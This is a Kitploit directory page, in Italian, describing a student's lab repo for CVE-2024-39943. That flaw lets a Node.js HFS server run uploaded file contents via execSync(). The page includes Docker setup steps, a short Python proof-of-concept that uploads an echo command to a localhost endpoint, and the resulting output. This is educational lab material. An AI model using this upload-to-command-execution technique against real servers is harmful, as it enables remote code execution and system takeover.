Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Node.js-CVE-2024-39943 | Kitploit
Strumenti/GitHubGitHub/jenmrr/node.js-cve-2024-39943
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubjenmrr/node.js-cve-2024-39943

Node.js-CVE-2024-39943

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Vulnerabilità di esecuzione dei comandi in Node.js HFS (CVE-2024-39943)

White Hat School 3ª edizione – 노정민 (@JenmrR)


Riepilogo

In un ambiente server HFS basato su Node.js esiste una vulnerabilità che esegue il contenuto dei file caricati tramite child_process.execSync().
Un attaccante può eseguire direttamente comandi del sistema operativo tramite la funzionalità di caricamento dei file e può verificare i risultati dei comandi interni del server o controllare il sistema.
Questa è la vulnerabilità corrispondente a CVE-2024-39943 e rappresenta una minaccia dello stesso livello dell'iniezione di comandi (Remote Code Execution).


Configurazione dell'ambiente ed esecuzione

  1. Eseguire il server tramite ambiente Docker
  2. Il server riceve i file caricati sul percorso /upload ed esegue il contenuto dei file caricati direttamente come comando
  3. L'attaccante può ottenere RCE tramite il caricamento di file

Flusso di esecuzione

root@kitploit:~
$ sudo docker-compose up --build -d
root@kitploit:~
$ python3 poc.py

poc.py

root@kitploit:~
import requests

payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }

r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)

Risultato

Risposta del server dopo l'esecuzione del PoC:

root@kitploit:~
Executed:
Hello_From_Hacked_Server

poc-result


Conclusioni

  • Questa vulnerabilità è una tipica vulnerabilità RCE (Remote Command Execution) che si verifica quando l'input esterno viene eseguito come comando del sistema operativo.
  • Eseguire direttamente il contenuto dei file caricati tramite execSync() comporta un grave rischio per la sicurezza.
  • L'input dell'utente deve essere sempre convalidato e non deve essere eseguito direttamente all'interno del server.
Scarica lo strumento